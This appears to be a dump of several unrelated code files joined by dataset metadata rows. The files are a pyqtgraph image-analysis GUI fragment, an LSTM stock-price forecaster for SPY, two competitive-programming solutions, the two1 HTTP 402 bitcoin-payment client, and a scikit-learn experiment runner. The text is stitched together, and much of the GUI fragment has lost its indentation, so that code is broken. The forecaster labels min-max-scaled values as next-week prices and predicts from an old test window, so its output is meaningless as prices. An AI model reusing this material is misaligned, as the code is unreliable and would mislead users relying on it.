                self.p2.setAspectLocked()
                self.p2.autoRange()
                self.w1_m.valueChangedX.connect(updateThresh)
                updateThresh()
            else:
                # Masks already displayed: refresh the view and reconnect.
                self.p2.setAspectLocked(ratioKept)
                self.p2.autoRange()
                self.img_m.setImage(np.rot90(self.masks[self.w1.x],3))
                self.p2.setAspectLocked()
                self.p2.autoRange()
                self.w1_m.valueChangedX.connect(updateThresh)
def updateThresh():
self.masks = np.array(self.masks_original > self.w1_m.x,dtype=np.uint8)
updateImage()
# Get action of user
self.w2.isShooted.connect(shootingProcedure)
self.w2.isunShooted.connect(unShoot)
self.w2.isG1.connect(G1)
self.w2.isEarlyS.connect(earlyS)
self.w2.isMidS.connect(midS)
self.w2.isLateS.connect(lateS)
self.w2.isG2.connect(G2)
self.w2.isEnd.connect(end)
self.w2.isloadMasks.connect(loadMasks)
self.w2.iscomputeMasks.connect(computeMasks)
self.img = pg.ImageItem(None, border="w")
# self.img.setRect(QRect(100, 200, 11, 16))
p1.addItem(self.img)
# Custom ROI for selecting an image region (axis swaped)
self.roi = pg.ROI([20, 20], [int(self.ny/10), int(self.nx/10)])
self.roi.addScaleHandle([0.5, 1], [0.5, 0.001])
self.roi.addScaleHandle([0, 0.5], [0.999, 0.5])
self.roi.addScaleHandle([0.5, 0], [0.5, 0.999])
self.roi.addScaleHandle([1, 0.5], [0.001, 0.5])
# update when user change view
def updateImage():
self.data = self.im[self.w1.x]
self.img.setImage(np.rot90(self.data,3))
if self.maskLoaded:
self.img_m.setImage(np.rot90(self.masks[self.w1.x],3))
if self.Shooted:
# import ipdb.ipdb.set_trace()
self.img_crop.setImage(np.rot90(self.im_focus[self.w1.x],3))
self.w1.valueChangedX.connect(updateImage)
p1.addItem(self.roi)
self.roi.setZValue(10) # make sure ROI is drawn above image
# Contrast/color control
# hist = pg.HistogramLUTItem(fillHistogram=False)
# hist.setImageItem(self.img)
# self.win.addItem(hist)
self.img.setImage(np.rot90(self.data,3))
# hist.setLevels(self.data.min(), self.data.max())
p1.setAspectLocked()
p1.autoRange()
self.boundingBox = [None,None]
# Callbacks for handling user interaction
def updatePlot():
global img, roi, data
selected = self.roi.getArrayRegion(self.data, self.img)
self.boundingBox = [[int(self.roi.pos().x()),int(self.roi.pos().y())],\
[int(self.roi.pos().x()+self.roi.size().x()),int(self.roi.pos().y()+self.roi.size().y())]]
self.roi.sigRegionChanged.connect(updatePlot)
updatePlot()
def trackingProcedure():
self.start_tracking = self.w1.x
def endTrackingProcedure():
if self.Shooted:
self.end_tracking = self.w1.x
if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'track',str(self.shootID))):
os.makedirs(os.path.join(dir_file,'Outputs',file_name,'track',str(self.shootID)))
for k in range(self.start_tracking,self.end_tracking):
tmp = np.array(self.im_focus[k]*self.mask_crop[k],dtype=np.float32)
tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'track',str(self.shootID),'image_'+str(k).zfill(10)+'.png'),tmp)
if self.secondChannel:
tmp = np.array(self.im_channel_focus[k],dtype=np.float32)
tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'track',str(self.shootID),'image2_'+str(k).zfill(10)+'.png'),tmp)
else:
print('Not in shooting mode.')
self.w3 = InterfaceManagerButton()
self.horizontalLayout.addWidget(self.w3)
self.w3.isQuit.connect(quitProcedure)
self.w3.isChannel.connect(newChannelProcedure)
self.w3.isTrack.connect(trackingProcedure)
self.w3.isTrackEnd.connect(endTrackingProcedure)
# self.w3.iscomputeSpeed.connect(Speed)
# self.w3.iscomputeVolume.connect(Volume)
# self.w3.iscomputeStep.connect(Step)
    def getInt(self, message):
        """Prompt the user for an integer with a modal input dialog.

        Dialog defaults: value 30, allowed range 1-1000, step 10.
        NOTE(review): `d` is returned even when the dialog is cancelled
        (okPressed False) — presumably the dialog's current/initial value;
        confirm this is the intended fallback.
        """
        d,okPressed=QInputDialog.getInt(self,message,'Value',30,1,1000,10)
        if okPressed:
            # Echo the prompt and the chosen value to the console for tracing.
            print(message)
            print('Value: '+str(int(d)))
        return int(d)
# Returns a byte-scaled image
def bytescale(data, cmin=None, cmax=None, high=255, low=0):
    """Convert an array to uint8, linearly mapping [cmin, cmax] to [low, high].

    If ``data`` already has dtype uint8 it is returned unchanged (same
    object, no copy). Otherwise values are shifted/scaled so that ``cmin``
    maps to ``low`` and ``cmax`` maps to ``high``, rounded to the nearest
    integer, and clamped before the uint8 cast.

    Parameters
    ----------
    data : ndarray
        Input image data.
    cmin, cmax : scalar, optional
        Input range; default to ``data.min()`` / ``data.max()``.
    high, low : scalar, optional
        Output range; defaults 255 and 0.

    Returns
    -------
    uint8 ndarray

    Raises
    ------
    ValueError
        If ``high < low`` or ``cmax < cmin``.

    Examples
    --------
    >>> img = np.array([[ 91.06794177, 3.39058326, 84.4221549 ],
    ...                 [ 73.88003259, 80.91433048, 4.88878881],
    ...                 [ 51.53875334, 34.45808177, 27.5873488 ]])
    >>> bytescale(img)
    array([[255,   0, 236],
           [205, 225,   4],
           [140,  90,  70]], dtype=uint8)
    """
    # uint8 input: nothing to do.
    if data.dtype == np.uint8:
        return data
    if high < low:
        raise ValueError("`high` should be larger than `low`.")
    lo_in = data.min() if cmin is None else cmin
    hi_in = data.max() if cmax is None else cmax
    span = hi_in - lo_in
    if span < 0:
        raise ValueError("`cmax` should be larger than `cmin`.")
    if span == 0:
        # Constant input: avoid division by zero; everything maps to `low`.
        span = 1
    scale = float(high - low) / span
    # +0.4999 implements round-half-ish before the truncating uint8 cast.
    scaled = (data * 1.0 - lo_in) * scale + 0.4999
    scaled[scaled > high] = high
    scaled[scaled < 0] = 0
    return np.array(scaled, dtype=np.uint8) + np.array(low, dtype=np.uint8)
class SecondWindow(QtGui.QWidget):
    """Minimal secondary window: a single push button in a horizontal layout."""

    def __init__(self, parent):
        """Build the widget under `parent` and show it immediately."""
        QtGui.QWidget.__init__(self, parent)
        self.button = QtGui.QPushButton("my button !")
        box = QtGui.QHBoxLayout()
        box.addWidget(self.button)
        self.setLayout(box)
        self.show()
# Interpret image data as row-major instead of col-major
# pg.setConfigOptions(imageAxisOrder='row-major')
# pg.mkQApp()
# win = pg.GraphicsLayoutWidget()
# win.setWindowTitle('pyqtgraph example: Image Analysis')
if __name__ == '__main__':
    # Entry point: create the Qt application, show the main Widget, and
    # block in the Qt event loop until the window is closed.
    app = QApplication(sys.argv)
    w = Widget()
    w.show()
    sys.exit(app.exec_())
29439792833 | # Import necessary libraries
import yfinance as yf
import numpy as np
from sklearn.preprocessing import MinMaxScaler
import tensorflow as tf
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, LSTM, Dropout
from sklearn.metrics import mean_squared_error
from datetime import datetime, timedelta
# Download roughly 700 days of hourly SPY bars ending today.
end_date = datetime.today().strftime('%Y-%m-%d')
start_date = (datetime.today() - timedelta(days=700)).strftime('%Y-%m-%d')
data = yf.download("SPY", start=start_date, end=end_date, interval="1h")
# Scale closing prices into [0, 1] for LSTM training.
close_prices = data['Close'].values.reshape(-1, 1)
scaler = MinMaxScaler(feature_range=(0, 1))
scaled_data = scaler.fit_transform(close_prices)
# Supervised windows: 60 hours of history -> the next 168 hours (one week).
sequence_length = 60
prediction_length = 168
X, y = [], []
for i in range(sequence_length, len(scaled_data)-prediction_length):
    X.append(scaled_data[i-sequence_length:i, 0])
    y.append(scaled_data[i:i+prediction_length, 0])
X, y = np.array(X), np.array(y)
# Chronological 80/20 split (no shuffling — this is a time series).
train_size = int(0.8 * len(X))
X_train, X_test = X[:train_size], X[train_size:]
y_train, y_test = y[:train_size], y[train_size:]
# Add the trailing feature axis Keras LSTMs expect: (samples, timesteps, 1).
X_train = np.reshape(X_train, (X_train.shape[0], X_train.shape[1], 1))
X_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], 1))
def create_model(lstm_units, dropout_rate):
    """Build and compile a 3-layer stacked LSTM regressor.

    Each LSTM layer is followed by a Dropout layer; the final Dense layer
    emits `prediction_length` values (the week-ahead hourly forecast).
    Compiled with the Adam optimizer and MSE loss.
    """
    layers = [
        LSTM(units=lstm_units, return_sequences=True, input_shape=(X_train.shape[1], 1)),
        Dropout(dropout_rate),
        LSTM(units=lstm_units, return_sequences=True),
        Dropout(dropout_rate),
        LSTM(units=lstm_units),
        Dropout(dropout_rate),
        Dense(units=prediction_length),
    ]
    net = Sequential()
    for layer in layers:
        net.add(layer)
    net.compile(optimizer='adam', loss='mean_squared_error')
    return net
# Manual hyper-parameter grid search over units, dropout, and batch size.
lstm_units_list = [30, 50, 80]
dropout_rates = [0.1, 0.2, 0.3]
batch_sizes = [16, 32, 64]
best_model = None
best_score = float('inf')
for lstm_units in lstm_units_list:
    for dropout_rate in dropout_rates:
        for batch_size in batch_sizes:
            print(f"Training with lstm_units={lstm_units}, dropout_rate={dropout_rate}, batch_size={batch_size}")
            model = create_model(lstm_units, dropout_rate)
            model.fit(X_train, y_train, epochs=10, batch_size=batch_size, validation_data=(X_test, y_test), verbose=0)
            predictions = model.predict(X_test)
            mse_score = mean_squared_error(y_test, predictions)
            print(f"MSE Score: {mse_score}")
            if mse_score < best_score:
                best_score = mse_score
                best_model = model
            # NOTE(review): after this search, `predictions` holds the output
            # of the *last* model tried, not necessarily `best_model`.
            # Early-exit once the score is "good enough" (0.013); the check is
            # repeated at every nesting level to break out of all three loops.
            if best_score < 0.013:
                break
        if best_score < 0.013:
            break
    if best_score < 0.013:
        break
print("\nBest Model:")
print(f"MSE Score: {best_score}")
print("Predicted prices for the next week (hourly):")
# Bug fix: `predictions` previously carried over from the *last* model trained
# in the grid search, not the best one, so the printed forecast did not match
# the reported "Best Model". Recompute from the winning model.
predictions = best_model.predict(X_test)
current_date = datetime.today() + timedelta(days=1)
# Print the 168-hour forecast as 7 blocks of 24 hourly (scaled) prices.
for i in range(0, prediction_length, 24):
    print("\nDate:", current_date.strftime('%Y-%m-%d'))
    daily_prices = predictions[0][i:i+24]
    for price in daily_prices:
        print(f"{price:.2f}")
    current_date += timedelta(days=1)
def resolve():
    """Read strings s and t from stdin.

    Print the smallest prefix length of s repeated infinitely that contains
    t as a subsequence, or -1 if some character of t never occurs in s.
    """
    s = input()
    t = input()
    # positions[ch] = sorted indices at which ch occurs in s
    positions = {}
    for idx, ch in enumerate(s):
        positions.setdefault(ch, []).append(idx)
    from bisect import bisect_right
    wraps = 0   # number of full copies of s already consumed
    last = -1   # index within the current copy of s of the last matched char
    for ch in t:
        if ch not in positions:
            print(-1)
            return
        occ = positions[ch]
        # First occurrence of ch strictly after `last` in the current copy.
        j = bisect_right(occ, last)
        if j == len(occ):
            # None left in this copy: wrap around to the next copy of s.
            wraps += 1
            last = occ[0]
        else:
            last = occ[j]
    print(wraps * len(s) + last + 1)
if __name__ == '__main__':
    resolve()
37565916920 | """This module provides various BitRequests methods, including:
`BitTransferRequests`, `OnChainRequests`, and `ChannelRequests`. These objects
can be used to make 402-enabled, paid HTTP requests to servers that
support the 402-protocol and those specific payment methods.
"""
import time
import json
import codecs
import logging
import requests
import urllib.parse
import two1
from two1.commands.util import config
import two1.commands.util.exceptions as exceptions
logger = logging.getLogger('bitrequests')
class BitRequestsError(Exception):
    """Base class for all exceptions raised by BitRequests modules."""
    pass
class UnsupportedPaymentMethodError(BitRequestsError):
    """Raised when the server's 402 headers lack the fields this payment method requires."""
    pass
class ResourcePriceGreaterThanMaxPriceError(BitRequestsError):
    """Raised when paying for a resource whose price exceeds the client's maximum allowable price."""
    pass
class InsufficientBalanceError(BitRequestsError):
    """Raised when attempting to pay for a resource whose price exceeds the available balance."""
    pass
class BitRequests(object):
    """Implements the HTTP 402 bitcoin payment protocol on the client side.
    If an initial request returns '402: Payment Required', the class defers to
    its `make_402_payment()` to create the necessary payment.
    """
    def __init__(self):
        """Initialize BitRequests."""
        pass
    def make_402_payment(self, response, max_price):
        """Payment handling method implemented by a BitRequests subclass.
        Args:
            response (requests.response): 402 response from the API server.
            max_price (int): maximum allowed price for a request (in satoshi).
        Returns:
            headers (dict):
                dict of headers with payment data to send to the
                API server to inform payment status for the resource.
        """
        raise NotImplementedError()
    def get_402_info(self, url):
        """Method for retrieving 402 metadata associated with the resource.
        Args:
            url (string): URL of the requested resource.
        Returns:
            headers (dict):
                dict of headers from the resource.
                Example: {'price': 5000, 'username': 'some_merchant'}
        """
        raise NotImplementedError()
    def _reset_file_positions(self, files, data):
        """Resets the `read` cursor position of a group of files.
        This method will mutate all file-like objects in the `files` or `data`
        parameters. It has no effect when `files` and `data` are None, or when
        `data` is not a file type.
        Args:
            data (file): a file-like object.
            files (dict or list): a key-value store of file identifiers and
                file-like objects or tuples that contain file-like objects.
        TODO: allow for `files` lists where there may be multiple values for
            the same key, which currently collide when cast to a dict
        """
        if files:
            file_list = list(dict(files).values())
            # Allow for one level of nesting for file fields
            if isinstance(file_list[0], (list, tuple)):
                file_list = [f[1] for f in file_list]
        elif data:
            file_list = [data]
        else:
            return
        # Only seek through the objects if they are seekable
        for f in file_list:
            if hasattr(f, 'seek'):
                f.seek(0)
    def request(self, method, url, max_price=None, mock_requests=False, **kwargs):
        """Make a 402 request for a resource.
        This is the BitRequests public method that should be used to complete a
        402 request using the desired payment method (as constructed by a class
        implementing BitRequests)
        Args:
            method (string): HTTP method for completing the request in lower-
                case letters. Examples: 'get', 'post', 'put'
            url (string): URL of the requested resource.
            data (dict): python dict of parameters to send with the request.
            max_price (int): maximum allowed price for a request (in satoshi).
            mock_requests (bool): if True, skip the network entirely and
                return a fabricated empty 200 response (for testing).
        Returns:
            response (requests.response):
                response from paying for the requested resource, with an
                `amount_paid` attribute (satoshi) attached.
        """
        if mock_requests:
            # Test short-circuit: fabricate an empty 200 response.
            fake_response = requests.models.Response()
            fake_response.status_code = 200
            fake_response._content = b''
            return fake_response
        # Make the initial request for the resource
        response = requests.request(method, url, **kwargs)
        # Return if we receive a status code other than 402: payment required
        if response.status_code != requests.codes.payment_required:
            return response
        # Pass the response to the main method for handling payment
        logger.debug('[BitRequests] 402 payment required: {} satoshi.'.format(
            response.headers['price']))
        payment_headers = self.make_402_payment(response, max_price)
        # Reset the position of any files that have been used
        # (the initial request already consumed them).
        self._reset_file_positions(kwargs.get('files'), kwargs.get('data'))
        # Add any user-provided headers to the payment headers dict
        if 'headers' in kwargs:
            if isinstance(kwargs['headers'], dict):
                kwargs['headers'].update(payment_headers)
            else:
                raise ValueError('argument \'headers\' must be a dict.')
        else:
            kwargs['headers'] = payment_headers
        # Retry the request, this time carrying the payment headers.
        paid_response = requests.request(method, url, **kwargs)
        # Record the price paid so callers can inspect the cost.
        setattr(paid_response, 'amount_paid', int(response.headers['price']))
        if paid_response.status_code == requests.codes.ok:
            logger.debug('[BitRequests] Successfully purchased resource.')
        else:
            logger.debug('[BitRequests] Could not purchase resource.')
        return paid_response
    def get(self, url, max_price=None, **kwargs):
        """Make a paid GET request for a resource."""
        return self.request('get', url, max_price, **kwargs)
    def put(self, url, max_price=None, **kwargs):
        """Make a paid PUT request for a resource."""
        return self.request('put', url, max_price, **kwargs)
    def post(self, url, max_price=None, **kwargs):
        """Make a paid POST request for a resource."""
        return self.request('post', url, max_price, **kwargs)
    def delete(self, url, max_price=None, **kwargs):
        """Make a paid DELETE request for a resource."""
        return self.request('delete', url, max_price, **kwargs)
    def head(self, url, max_price=None, **kwargs):
        """Make a paid HEAD request for a resource."""
        return self.request('head', url, max_price, **kwargs)
class BitTransferRequests(BitRequests):
    """BitRequests for making bit-transfer payments."""
    # Header names used by the 402 bit-transfer handshake.
    HTTP_BITCOIN_PRICE = 'price'
    HTTP_BITCOIN_ADDRESS = 'bitcoin-address'
    HTTP_BITCOIN_USERNAME = 'username'
    def __init__(self, wallet, username=None, client=None):
        """Initialize the bittransfer with wallet and username.
        Args:
            wallet: a wallet or MachineAuthWallet used to sign transfers.
            username (str): payer's 21 username; read from config if omitted.
            client: REST client for the 21 server; built here if omitted.
        """
        from two1.server.machine_auth_wallet import MachineAuthWallet
        from two1.server import rest_client
        super().__init__()
        # Wrap a raw wallet in a MachineAuthWallet when needed.
        if isinstance(wallet, MachineAuthWallet):
            self.wallet = wallet
        else:
            self.wallet = MachineAuthWallet(wallet)
        if username is None:
            self.username = config.Config().username
        else:
            self.username = username
        if client is None:
            self.client = rest_client.TwentyOneRestClient(
                two1.TWO1_HOST, self.wallet, self.username)
        else:
            self.client = client
    def make_402_payment(self, response, max_price):
        """Make a bit-transfer payment to the payment-handling service.
        Builds a JSON bit-transfer describing the payment and signs it with
        the wallet; the signature is sent as the Authorization header.
        Raises:
            UnsupportedPaymentMethodError: required 402 headers are missing.
            InsufficientBalanceError: price exceeds the 21 buffer balance.
            ResourcePriceGreaterThanMaxPriceError: price exceeds max_price.
        """
        # Retrieve payment headers
        headers = response.headers
        price = headers.get(BitTransferRequests.HTTP_BITCOIN_PRICE)
        payee_address = headers.get(BitTransferRequests.HTTP_BITCOIN_ADDRESS)
        payee_username = headers.get(BitTransferRequests.HTTP_BITCOIN_USERNAME)
        # Verify that the payment method is supported
        if price is None or payee_address is None or payee_username is None:
            raise UnsupportedPaymentMethodError(
                'Resource does not support that payment method.')
        # Convert string headers into correct data types
        price = int(price)
        # verify that we have the money to purchase the resource
        buffer_balance = self.client.get_earnings()["total_earnings"]
        if price > buffer_balance:
            insuff_funds_err = 'Resource price ({}) exceeds buffer balance ({}).'
            raise InsufficientBalanceError(insuff_funds_err.format(price, buffer_balance))
        # Verify resource cost against our budget
        if max_price and price > max_price:
            max_price_err = 'Resource price ({}) exceeds max price ({}).'
            raise ResourcePriceGreaterThanMaxPriceError(max_price_err.format(price, max_price))
        # Get the signing public key
        pubkey = self.wallet.get_public_key()
        compressed_pubkey = codecs.encode(pubkey.compressed_bytes, 'base64').decode()
        # Create and sign the BitTransfer payload
        bittransfer = json.dumps({
            'payer': self.username,
            'payer_pubkey': compressed_pubkey,
            'payee_address': payee_address,
            'payee_username': payee_username,
            'amount': price,
            'timestamp': time.time(),
            'description': response.url
        })
        if not isinstance(bittransfer, str):
            raise TypeError("Serialized bittransfer must be a string")
        signature = self.wallet.sign_message(bittransfer)
        logger.debug('[BitTransferRequests] Signature: {}'.format(signature))
        logger.debug('[BitTransferRequests] BitTransfer: {}'.format(bittransfer))
        return {
            'Bitcoin-Transfer': bittransfer,
            'Authorization': signature
        }
    def get_402_info(self, url):
        """Get bit-transfer payment information about the resource."""
        headers = requests.get(url).headers
        # Price defaults to 0 when the header is absent.
        price = headers.get(BitTransferRequests.HTTP_BITCOIN_PRICE, 0)
        payee_address = headers.get(BitTransferRequests.HTTP_BITCOIN_ADDRESS)
        payee_username = headers.get(BitTransferRequests.HTTP_BITCOIN_USERNAME)
        return {BitTransferRequests.HTTP_BITCOIN_PRICE: int(price),
                BitTransferRequests.HTTP_BITCOIN_ADDRESS: payee_address,
                BitTransferRequests.HTTP_BITCOIN_USERNAME: payee_username}
class OnChainRequests(BitRequests):
    """BitRequests for making on-chain payments."""
    # Header names used by the 402 on-chain handshake.
    HTTP_BITCOIN_PRICE = 'price'
    HTTP_BITCOIN_ADDRESS = 'bitcoin-address'
    HTTP_PAYER_21USERNAME = 'Payer-21Username'
    def __init__(self, wallet):
        """Initialize the on-chain request with a wallet."""
        super().__init__()
        self.wallet = wallet
        # Username is optional; a bad config file simply leaves it unset.
        try:
            self.username = config.Config().username
        except exceptions.FileDecodeError:
            self.username = None
    def make_402_payment(self, response, max_price):
        """Make an on-chain payment.
        Signs a bitcoin transaction paying the server's address and returns
        it (hex-encoded) in the payment headers.
        Raises:
            UnsupportedPaymentMethodError: required 402 headers are missing.
            ResourcePriceGreaterThanMaxPriceError: price exceeds max_price.
        """
        # Retrieve payment headers
        headers = response.headers
        price = headers.get(OnChainRequests.HTTP_BITCOIN_PRICE)
        payee_address = headers.get(OnChainRequests.HTTP_BITCOIN_ADDRESS)
        # Verify that the payment method is supported
        if price is None or payee_address is None:
            raise UnsupportedPaymentMethodError(
                'Resource does not support that payment method.')
        # Convert string headers into correct data types
        price = int(price)
        # Verify resource cost against our budget
        if max_price and price > max_price:
            max_price_err = 'Resource price ({}) exceeds max price ({}).'
            raise ResourcePriceGreaterThanMaxPriceError(max_price_err.format(price, max_price))
        # Create the signed transaction (unconfirmed inputs are allowed).
        onchain_payment = self.wallet.make_signed_transaction_for(
            payee_address, price, use_unconfirmed=True)[0].get('txn').to_hex()
        # Address the server can use to refund change/overpayment.
        return_address = self.wallet.current_address
        logger.debug('[OnChainRequests] Signed transaction: {}'.format(
            onchain_payment))
        return {
            'Bitcoin-Transaction': onchain_payment,
            'Return-Wallet-Address': return_address,
            OnChainRequests.HTTP_BITCOIN_PRICE: str(price),
            OnChainRequests.HTTP_PAYER_21USERNAME: urllib.parse.quote(self.username) if self.username else None
        }
    def get_402_info(self, url):
        """Get on-chain payment information about the resource."""
        headers = requests.get(url).headers
        # NOTE(review): unlike BitTransferRequests.get_402_info, there is no
        # default for a missing price header, so int(None) would raise here.
        price = headers.get(OnChainRequests.HTTP_BITCOIN_PRICE)
        payee_address = headers.get(OnChainRequests.HTTP_BITCOIN_ADDRESS)
        return {OnChainRequests.HTTP_BITCOIN_PRICE: int(price),
                OnChainRequests.HTTP_BITCOIN_ADDRESS: payee_address}
class ChannelRequests(BitRequests):
    """BitRequests for making channel payments."""
    import two1.channels as channels  # noqa
    # Header names used by the 402 payment-channel handshake.
    HTTP_BITCOIN_PRICE = 'price'
    HTTP_BITCOIN_PAYMENT_CHANNEL_SERVER = 'bitcoin-payment-channel-server'
    HTTP_BITCOIN_PAYMENT_CHANNEL_TOKEN = 'bitcoin-payment-channel-token'
    HTTP_PAYER_21USERNAME = 'Payer-21Username'
    # Channel-opening defaults: deposit in satoshi, duration in seconds.
    DEFAULT_DEPOSIT_AMOUNT = 100000
    DEFAULT_DURATION = 86400 * 8
    DEFAULT_ZEROCONF = True
    DEFAULT_USE_UNCONFIRMED = False
    def __init__(self, wallet, deposit_amount=DEFAULT_DEPOSIT_AMOUNT, duration=DEFAULT_DURATION):
        """Initialize the channel requests with a payment channel client."""
        super().__init__()
        self._channelclient = ChannelRequests.channels.PaymentChannelClient(wallet)
        self._deposit_amount = deposit_amount
        self._duration = duration
        # Username is optional; a bad config file simply leaves it unset.
        try:
            self.username = config.Config().username
        except exceptions.FileDecodeError:
            self.username = None
    def make_402_payment(self, response, max_price):
        """Make a channel payment.
        Reuses an existing channel with the server when one is usable,
        otherwise opens a new one, then pays `price` through it and returns
        the resulting token in the payment headers.
        Raises:
            UnsupportedPaymentMethodError: required 402 headers are missing.
            ResourcePriceGreaterThanMaxPriceError: price exceeds max_price.
        """
        # Retrieve payment headers
        price = response.headers.get(ChannelRequests.HTTP_BITCOIN_PRICE)
        server_url = response.headers.get(ChannelRequests.HTTP_BITCOIN_PAYMENT_CHANNEL_SERVER)
        # Verify that the payment method is supported
        if price is None or server_url is None:
            raise UnsupportedPaymentMethodError(
                'Resource does not support channels payment method.')
        # Convert string headers into correct data types
        price = int(price)
        # Verify resource cost against our budget
        if max_price and price > max_price:
            max_price_err = 'Resource price ({}) exceeds max price ({}).'
            raise ResourcePriceGreaterThanMaxPriceError(max_price_err.format(price, max_price))
        # Look up an existing channel to this server (first one, if any)
        channel_urls = self._channelclient.list(server_url)
        channel_url = channel_urls[0] if channel_urls else None
        if channel_url:
            # Get channel status
            status = self._channelclient.status(channel_url)
            # Check if channel has expired
            if status.ready and status.expired:
                logger.debug("[ChannelRequests] Channel expired. Refreshing channel.")
                self._channelclient.sync(channel_url)
                channel_url = None
            # Check if the channel balance is sufficient
            elif status.ready and status.balance < price:
                logger.debug("[ChannelRequests] Channel balance low. Refreshing channel.")
                self._channelclient.close(channel_url)
                status = self._channelclient.status(channel_url)
                logger.debug("[ChannelRequests] Channel spend txid is {}".format(status.spend_txid))
                channel_url = None
            # Check if the channel deposit is still being confirmed
            elif status.state == ChannelRequests.channels.PaymentChannelState.CONFIRMING_DEPOSIT:
                logger.debug("[ChannelRequests] Channel deposit tx still being confirmed.")
                self._channelclient.sync(channel_url)
                status = self._channelclient.status(channel_url)
                if not status.ready:
                    raise ChannelRequests.channels.NotReadyError("Channel not ready.")
        # Open a new channel if we don't have a usable one.
        # (Short-circuit: `status` is only read when channel_url is truthy,
        # in which case it was assigned above.)
        if not channel_url or not status.ready:
            logger.debug("[ChannelRequests] Opening channel at {} with deposit {}.".format(
                server_url, self._deposit_amount))
            channel_url = self._channelclient.open(
                server_url, self._deposit_amount, self._duration,
                zeroconf=ChannelRequests.DEFAULT_ZEROCONF, use_unconfirmed=ChannelRequests.DEFAULT_USE_UNCONFIRMED)
            status = self._channelclient.status(channel_url)
            logger.debug("[ChannelRequests] Channel deposit txid is {}".format(status.deposit_txid))
        # Pay through the channel
        logger.debug("[ChannelRequests] Paying channel {} with amount {}.".format(channel_url, price))
        try:
            token = self._channelclient.pay(channel_url, price)
        except ChannelRequests.channels.ClosedError:
            # If the server closed the channel, restart payment process to
            # negotiate a new channel.
            # NOTE(review): recursion is unbounded if the server keeps
            # closing channels — confirm a retry limit is not needed.
            return self.make_402_payment(response, max_price)
        return {
            ChannelRequests.HTTP_BITCOIN_PAYMENT_CHANNEL_TOKEN: token,
            ChannelRequests.HTTP_BITCOIN_PRICE: str(price),
            ChannelRequests.HTTP_PAYER_21USERNAME: urllib.parse.quote(self.username) if self.username else None,
        }
    def get_402_info(self, url):
        """Get channel payment information about the resource."""
        response = requests.get(url)
        price = response.headers.get(ChannelRequests.HTTP_BITCOIN_PRICE)
        channel_url = response.headers.get(ChannelRequests.HTTP_BITCOIN_PAYMENT_CHANNEL_SERVER)
        return {ChannelRequests.HTTP_BITCOIN_PRICE: price,
                ChannelRequests.HTTP_BITCOIN_PAYMENT_CHANNEL_SERVER: channel_url}
| 21dotco/two1-python | two1/bitrequests/bitrequests.py | bitrequests.py | py | 18,360 | python | en | code | 366 | github-code | 90 |
72663369897 | import pandas as pd
import utils as u
import evaluate as evl
import math
from typing import List, Dict
from sklearn.preprocessing import PolynomialFeatures
from termcolor import cprint
def run_model_experiments(
    model_obj,
    model_name: str,
    feat_train: pd.DataFrame,
    target_train: pd.Series,
    feature_sets_dict: Dict[str, List],
    metrics_list: List,
    is_poly: bool = False
) -> List[Dict]:
    """ Run cross-validated model experiments for different feature sets.

    Args:
        model_obj: model object to run experiments on.
        model_name: name of the model.
        feat_train: training dataframe with features.
        target_train: training series with target variable.
        feature_sets_dict: dict of all feature sets to experiment on.
        metrics_list: list to append experiment results to.
        is_poly: whether a degree-2 polynomial feature transform should be
            added to the pipeline.

    Returns:
        The same `metrics_list`, with one scoring dict appended per
        feature set.
    """
    if is_poly:
        model_pipeline = u.create_model_pipeline(model_obj, is_poly=True)
        # NOTE(review): the pipeline is created with is_poly=True *and* a
        # PolynomialFeatures step is inserted here — confirm this is not a
        # duplicated transform inside create_model_pipeline.
        model_pipeline.steps.insert(2, ['poly_transform', PolynomialFeatures(2)])
    else:
        model_pipeline = u.create_model_pipeline(model_obj)
    for i, (feature_set_name, feature_set) in enumerate(feature_sets_dict.items()):
        metrics_dict = {}
        metrics_dict['model_name'] = model_name
        metrics_dict['feature_set'] = feature_set_name
        cprint(f'[TRAINING] {model_name} ------', color='red')
        select_feat_train = feat_train[feature_set]
        scores = evl.get_cross_val_scores(
            select_feat_train,
            target_train,
            model_pipeline
        )
        # Key names kept for backward compatibility with downstream readers.
        # NOTE(review): the *_mse_* keys actually hold RMSE (sqrt applied),
        # and *_mse_std is sqrt(std of MSE), which is not the std of RMSE.
        metrics_dict['train_mse_mean'] = math.sqrt(-(scores['train_neg_mean_squared_error'].mean()))
        metrics_dict['test_mse_mean'] = math.sqrt(-(scores['test_neg_mean_squared_error'].mean()))
        metrics_dict['train_mse_std'] = math.sqrt((scores['train_neg_mean_squared_error'].std()))
        metrics_dict['test_mse_std'] = math.sqrt((scores['test_neg_mean_squared_error'].std()))
        # Negated because sklearn reports "neg_mean_absolute_error".
        metrics_dict['train_mae_mean'] = -(scores['train_neg_mean_absolute_error'].mean())
        metrics_dict['test_mae_mean'] = -(scores['test_neg_mean_absolute_error'].mean())
        metrics_dict['train_mae_std'] = (scores['train_neg_mean_absolute_error'].std())
        metrics_dict['test_mae_std'] = (scores['test_neg_mean_absolute_error'].std())
        metrics_dict['train_r2_mean'] = (scores['train_r2'].mean())
        metrics_dict['test_r2_mean'] = (scores['test_r2'].mean())
        metrics_dict['train_r2_std'] = (scores['train_r2'].std())
        metrics_dict['test_r2_std'] = (scores['test_r2'].std())
        metrics_list.append(metrics_dict)
        cprint(f'[EXP {i}] {feature_set_name} [DONE]', color='green')
    return metrics_list
import sys

sys.setrecursionlimit(10**7)
input = sys.stdin.readline

n = int(input())
s = input()

# Interpret the binary string as an integer and count its set bits.
value = int(s, 2)
ones = s.count('1')

# Precompute the value modulo (popcount - 1) and (popcount + 1): flipping a
# '1' bit decreases the popcount by one, flipping a '0' bit increases it.
mod_minus = value % (ones - 1) if ones > 1 else 0
mod_plus = value % (ones + 1)

for i in range(n):
    if s[i] == '1':
        if ones == 1:
            # Flipping the only '1' gives 0, which terminates immediately.
            print(0)
            continue
        r = (mod_minus - pow(2, n - 1 - i, ones - 1)) % (ones - 1)
    else:
        r = (mod_plus + pow(2, n - 1 - i, ones + 1)) % (ones + 1)
    # Iterate x -> x mod popcount(x) until reaching 0, counting the steps.
    steps = 1
    while r > 0:
        r %= bin(r).count('1')
        steps += 1
    print(steps)
